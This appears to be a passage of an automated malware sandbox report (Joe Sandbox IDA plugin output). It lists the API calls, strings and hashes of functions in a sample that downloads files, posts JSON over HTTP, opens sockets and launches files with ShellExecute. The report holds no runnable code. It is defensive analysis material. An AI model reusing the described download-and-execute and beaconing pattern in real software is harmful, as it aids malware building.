                                                      • Instruction Fuzzy Hash: E851B374208741AFE724DF24CC95A9AB7E5FF85390F504A2DF09946196DB30B948CB62
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID:
                                                      • API String ID: 1452528299-0
                                                      • Opcode ID: 5d4c7d71a43ffbc65026255f10c8dbbe89a6762bbb9170d467f0eec00a2ceade
                                                      • Instruction ID: 52a0c41bfd207efae2051e98832a2de0653818bc3ca2d12135f47a2fcbf34020
                                                      • Opcode Fuzzy Hash: 5d4c7d71a43ffbc65026255f10c8dbbe89a6762bbb9170d467f0eec00a2ceade
                                                      • Instruction Fuzzy Hash: 0E1167B5908A02EFE341CF66D8C465AB7A4FF04316B15453EE40A8BA42C7B5F8E1CBD0
                                                      APIs
                                                        • Part of subcall function 1000E8B3: __time64.LIBCMT ref: 1000E8B8
                                                        • Part of subcall function 1000E8B3: _rand.LIBCMT ref: 1000E8C5
                                                      • __time64.LIBCMT ref: 1000FD3A
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                      • Sleep.KERNEL32(00000000), ref: 1000FD41
                                                      • __time64.LIBCMT ref: 1000FD49
                                                        • Part of subcall function 10015977: socket.WS2_32(00000002,00000002,00000011), ref: 10015987
                                                        • Part of subcall function 10015977: WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,1000FD6E,00000000), ref: 10015996
                                                        • Part of subcall function 10015F50: __EH_prolog.LIBCMT ref: 10015F55
                                                        • Part of subcall function 1001E093: CreateThread.KERNELBASE(00000000,00000000,1001C9A2,?,00000000,00000000), ref: 1001E0C3
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __time64$Time$CreateErrorFileH_prologLastSleepSystemThread__aulldiv_randsocket
                                                      • String ID:
                                                      • API String ID: 633608075-0
                                                      • Opcode ID: d30bed877b3eb11f29e50bc7e7300872d3162e6fabe178ceca34301d4a846610
                                                      • Instruction ID: 35e5114acfa28dfccaa75df531074f78d3d40b230bfa8580435eee44eb89e0c1
                                                      • Opcode Fuzzy Hash: d30bed877b3eb11f29e50bc7e7300872d3162e6fabe178ceca34301d4a846610
                                                      • Instruction Fuzzy Hash: AB016D3AA002009BEB06DF64D896B993350EF44315F040079E9055F1CBDFB5A9918BD5
                                                      APIs
                                                      • bind.WS2_32(?,00000000,00000010), ref: 10026357
                                                      • InterlockedIncrement.KERNEL32(1016AB00), ref: 1002636E
                                                      • InterlockedIncrement.KERNEL32(1016AB00), ref: 1002637D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: IncrementInterlocked$bind
                                                      • String ID:
                                                      • API String ID: 3786334496-0
                                                      • Opcode ID: 94adce06318814bd4522cea5ae5fc3188a8e10390c8465523d5d10866b9f62d9
                                                      • Instruction ID: cae9bc99e758d100439ed7dae87e6c8f9df862dd16c75337faaf3fda47366c04
                                                      • Opcode Fuzzy Hash: 94adce06318814bd4522cea5ae5fc3188a8e10390c8465523d5d10866b9f62d9
                                                      • Instruction Fuzzy Hash: 6EF0A032300109BBE310CF6AFC84A69B7A9EB88771F908236F405C21D0D765DDA0EA69
                                                      APIs
                                                        • Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
                                                        • Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC
                                                      • _GetPrimaryLen.LIBCMT ref: 1004AA88
                                                      • EnumSystemLocalesW.KERNEL32(1004AB3D,00000001,000000A0,?,?,1004B05B,00000000,?,?,?,?,?,00000055), ref: 1004AA98
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: EnumLocalesPrimarySystem__amsg_exit__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 3487593440-0
                                                      • Opcode ID: 70a532fc47c7d692866dcf51e4e51e09fad5cd5e34bb1bb8c71259a40cc486ad
                                                      • Instruction ID: e4f5bf762e8bed9ecc96679d54a5a3165a8cb5c09cd1d724635148da98d84293
                                                      • Opcode Fuzzy Hash: 70a532fc47c7d692866dcf51e4e51e09fad5cd5e34bb1bb8c71259a40cc486ad
                                                      • Instruction Fuzzy Hash: 7F01F7329503069FE720DF74C505BA5B7E1EF02351F304A39E559C6481D774B4A0CB55
                                                      APIs
                                                        • Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
                                                        • Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC
                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,1004ADDE,00000000,00000000,?), ref: 1004AF2F
                                                      • _GetPrimaryLen.LIBCMT ref: 1004AF4E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocalePrimary__amsg_exit__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 2554324226-0
                                                      • Opcode ID: 44e3f6268d0e3cca7410006feda8c8aca15b844b97b17775b9935bfca78b25e7
                                                      • Instruction ID: 3dd6440eadb722f76f0369bf2d9dd3b9ea9534e0bdb3ccb9691e06d8b38164c1
                                                      • Opcode Fuzzy Hash: 44e3f6268d0e3cca7410006feda8c8aca15b844b97b17775b9935bfca78b25e7
                                                      • Instruction Fuzzy Hash: A2F02B72B10211BBEF54D7B0CC41BD97798DB01290F218135E905E2081EA30FE8186A4
                                                      APIs
                                                        • Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
                                                        • Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC
                                                      • _GetPrimaryLen.LIBCMT ref: 1004AAEC
                                                      • EnumSystemLocalesW.KERNEL32(1004AD30,00000001,?,?,1004B025,100443E2,?,?,00000055,?,?,100443E2,?,?,?), ref: 1004AAFF
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: EnumLocalesPrimarySystem__amsg_exit__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 3487593440-0
                                                      • Opcode ID: b507115a12aede8afc50f6795c79fd542520108237a0ab1eec08c1fd64176629
                                                      • Instruction ID: 90c69a740598df8a7c97daa28306f4296dc0cc8195bcd8a038c9ae0d12bfce9b
                                                      • Opcode Fuzzy Hash: b507115a12aede8afc50f6795c79fd542520108237a0ab1eec08c1fd64176629
                                                      • Instruction Fuzzy Hash: 1FF0A031A50305AEEB21DB34EC01F963BD5DB032A1F218835F859CA592DB716C808AA9
                                                      APIs
                                                        • Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
                                                        • Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 1004AD89
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale__amsg_exit__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 3113341244-0
                                                      • Opcode ID: fe672935b31e10ec36b9e58a5ce42d01419b777e97ef84b42b5b017214f70699
                                                      • Instruction ID: ba8ac100b159e6eb14fcaca4a8efd505697d17c03d6c91541e12f7df10b91ca0
                                                      • Opcode Fuzzy Hash: fe672935b31e10ec36b9e58a5ce42d01419b777e97ef84b42b5b017214f70699
                                                      • Instruction Fuzzy Hash: 1621C575A10616AFDB14CF24CC41BAB73ECEF06351F214179E902CA481EB74ED84CB59
                                                      APIs
                                                        • Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
                                                        • Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0,100443E9,00000000,10044509), ref: 1004A9A7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale__amsg_exit__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 3113341244-0
                                                      • Opcode ID: 17b9c1de3b87ed76ff14aeacdcd79e2754f27964164271683bebc4ac99025428
                                                      • Instruction ID: c04881ae7a749eb8032178861f7d396fdc4e4c5735778cfc6174256c7ee410bf
                                                      • Opcode Fuzzy Hash: 17b9c1de3b87ed76ff14aeacdcd79e2754f27964164271683bebc4ac99025428
                                                      • Instruction Fuzzy Hash: 7CF0F4367102159BD714DB74DC46ABA33ACEB09311F210178EA01D7182EA74AD0186A8
                                                      APIs
                                                      • EnumSystemLocalesW.KERNEL32(1003B369,00000001,?,1004A2D5,1004A373,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 1003B3AB
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2099609381-0
                                                      • Opcode ID: 7916741a0dea384a482a9694cffe1b462559c18c4e1ed8854d1e7d2a365d660f
                                                      • Instruction ID: 5b5e60eb190fd5413a5b515707c804fded711c2c5a769b64abdf542a7218ae5c
                                                      • Opcode Fuzzy Hash: 7916741a0dea384a482a9694cffe1b462559c18c4e1ed8854d1e7d2a365d660f
                                                      • Instruction Fuzzy Hash: ACE0BF31154218EFEB11EFA5DC85B593BE6F704B15F404001F60C5F560D7F6A950DB54
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000000,00000000,00000002,?,?,1003D101,?,?,?,00000002,00000000,00000000,00000000), ref: 1003B3E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID:
                                                      • API String ID: 2299586839-0
                                                      • Opcode ID: 8ca0de2b206cff19592fcb975ba2b51d35eb7dccc7f2f4bbe84270fb292c124e
                                                      • Instruction ID: cab3a79e30e08c6fa743421f3241eba54f81d04790775e7bd8fade207c57906a
                                                      • Opcode Fuzzy Hash: 8ca0de2b206cff19592fcb975ba2b51d35eb7dccc7f2f4bbe84270fb292c124e
                                                      • Instruction Fuzzy Hash: D5D01736000119EFDF02EFE0EC458AA3BAAEB08215F408404FA084A420CBB2A9209B20
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5710a9a6f20bdab993f76e188229da93e40c0ebee1bc7497c7963f665c9584d0
                                                      • Instruction ID: 1352b449084b7d7e229a125dfea1212924286c728adef9f82d66defa94ae34fe
                                                      • Opcode Fuzzy Hash: 5710a9a6f20bdab993f76e188229da93e40c0ebee1bc7497c7963f665c9584d0
                                                      • Instruction Fuzzy Hash: 3FE16A75E00A168FCB50CF99C880BA9BBF5EF48754F2640A9D945EB351E734ED81CB60
                                                      APIs
                                                      • InternetOpenA.WININET(1005ADE8,00000000,00000000,00000000,00000000), ref: 10031B95
                                                      • GetLastError.KERNEL32 ref: 10031BA9
                                                      • _sprintf.LIBCMT ref: 10031BE2
                                                      • InternetCloseHandle.WININET(00000000), ref: 10031C18
                                                      • _memmove.LIBCMT ref: 10031C4B
                                                      • InternetSetOptionA.WININET(00000000,00000006,?,00000004), ref: 10031C64
                                                      • InternetConnectA.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 10031C86
                                                      • GetLastError.KERNEL32 ref: 10031C97
                                                      • _sprintf.LIBCMT ref: 10031CD0
                                                      • InternetCloseHandle.WININET(?), ref: 10031D05
                                                      • InternetCloseHandle.WININET(00000000), ref: 10031D09
                                                      • _memmove.LIBCMT ref: 10031D38
                                                      • InternetSetOptionA.WININET(00000000,00000006,?,00000004), ref: 10031D51
                                                      • HttpOpenRequestA.WININET(?,POST,00000000,00000000,00000000,00000000,04000000,00000001), ref: 10031D78
                                                      • GetLastError.KERNEL32 ref: 10031D89
                                                      • _sprintf.LIBCMT ref: 10031DC2
                                                      • InternetCloseHandle.WININET(?), ref: 10031DFD
                                                      • InternetCloseHandle.WININET(?), ref: 10031E02
                                                      • InternetCloseHandle.WININET(00000000), ref: 10031E06
                                                      • _memmove.LIBCMT ref: 10031E35
                                                      • HttpSendRequestA.WININET(?,?,?,?,?), ref: 10031E81
                                                      • GetLastError.KERNEL32 ref: 10031E8F
                                                      • _sprintf.LIBCMT ref: 10031ECE
                                                      • InternetCloseHandle.WININET(?), ref: 10031F08
                                                      • InternetCloseHandle.WININET(?), ref: 10031F0D
                                                      Strings
                                                      • POST, xrefs: 10031D70
                                                      • Content-Type: application/json;charset=UTF-8, xrefs: 10031E4A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$CloseHandle$ErrorLast_sprintf$_memmove$HttpOpenOptionRequest$ConnectSend
                                                      • String ID: Content-Type: application/json;charset=UTF-8$POST
                                                      • API String ID: 1869983202-4011478237
                                                      • Opcode ID: c25ce35a2a16a70e4361e8997c3c43b363ad9ca9d3b13bd1e9f88059e6eb9754
                                                      • Instruction ID: a2ba4f0a9c13a3d423ae63a4d74ca6f88612a5428f9d2dfc1c4a3448f85b64bd
                                                      • Opcode Fuzzy Hash: c25ce35a2a16a70e4361e8997c3c43b363ad9ca9d3b13bd1e9f88059e6eb9754
                                                      • Instruction Fuzzy Hash: DD025A708043599FEF26DFA4CC94BEEBBB5FF09305F104169E845AB282DB715948CBA1
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 100106D6
                                                        • Part of subcall function 100151F7: __EH_prolog.LIBCMT ref: 100151FC
                                                        • Part of subcall function 100151F7: GetTempPathA.KERNEL32(00000104,?,1005D0F4,?,1005D0F4,00000000,1005AF8C,?,1005AF8C,00000000,c:\,?,000001C8,?), ref: 100152A2
                                                      • _sprintf.LIBCMT ref: 100107A9
                                                      • _sprintf.LIBCMT ref: 100107E2
                                                      • _sprintf.LIBCMT ref: 1001083E
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,000001C8,?), ref: 1001085E
                                                      • _sprintf.LIBCMT ref: 1001092B
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 1001098D
                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 100109BD
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 100109DC
                                                      • _malloc.LIBCMT ref: 100109F9
                                                      • _sprintf.LIBCMT ref: 10010A18
                                                      • _free.LIBCMT ref: 10010A5C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _sprintf$ExecuteH_prologShell$ErrorLastPathSleepTemp_free_malloc
                                                      • String ID: %s%s$-R %s$C:\Program Files (x86)\Internet Explorer\%s$DLL inside run failed.$Memory loading failed.$Run timeout,path:%s param:%s code:%d$URL Address open failed.$c:\%s$don't have function name,only loadlibray main.$isnull$open$wb+
                                                      • API String ID: 511354059-3804541553
                                                      • Opcode ID: b5584df9892dddf49a48d71b8597b417fae9e67d29596936f68adca9d55465a3
                                                      • Instruction ID: 5d0e6c07e2bd914c6a5e838715f5ec936c7744656dec28dfbd057ca5cb6c25ae
                                                      • Opcode Fuzzy Hash: b5584df9892dddf49a48d71b8597b417fae9e67d29596936f68adca9d55465a3
                                                      • Instruction Fuzzy Hash: 20029475A00209AFEB14CFA8CD95FEA77B8EF04344F508169F9459B142DB71FA84CB91
                                                      APIs
                                                      • DeleteUrlCacheEntryA.WININET(?,93656AD3), ref: 100317A3
                                                      • InternetOpenA.WININET(1005ADE8,00000000,00000000,00000000,00000000), ref: 100317B6
                                                      • GetLastError.KERNEL32 ref: 100317C9
                                                      • _sprintf.LIBCMT ref: 100317F8
                                                      • InternetCloseHandle.WININET(00000000), ref: 10031828
                                                      • _memmove.LIBCMT ref: 10031853
                                                      • InternetSetOptionA.WININET(00000000,00000006,000007D0,00000004), ref: 10031888
                                                      • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 100318A3
                                                      • GetLastError.KERNEL32 ref: 100318B2
                                                      • _sprintf.LIBCMT ref: 100318E3
                                                      • InternetCloseHandle.WININET(00000000), ref: 1003191D
                                                      • _malloc.LIBCMT ref: 1003192B
                                                      • InternetReadFile.WININET(00000000,00000000,00000004,?), ref: 10031951
                                                      • _memmove.LIBCMT ref: 100319AF
                                                      • _memmove.LIBCMT ref: 10031A21
                                                      • _free.LIBCMT ref: 10031A99
                                                      • InternetCloseHandle.WININET(?), ref: 10031AAA
                                                      • InternetCloseHandle.WININET(?), ref: 10031AAF
                                                      • _memmove.LIBCMT ref: 10031AD6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
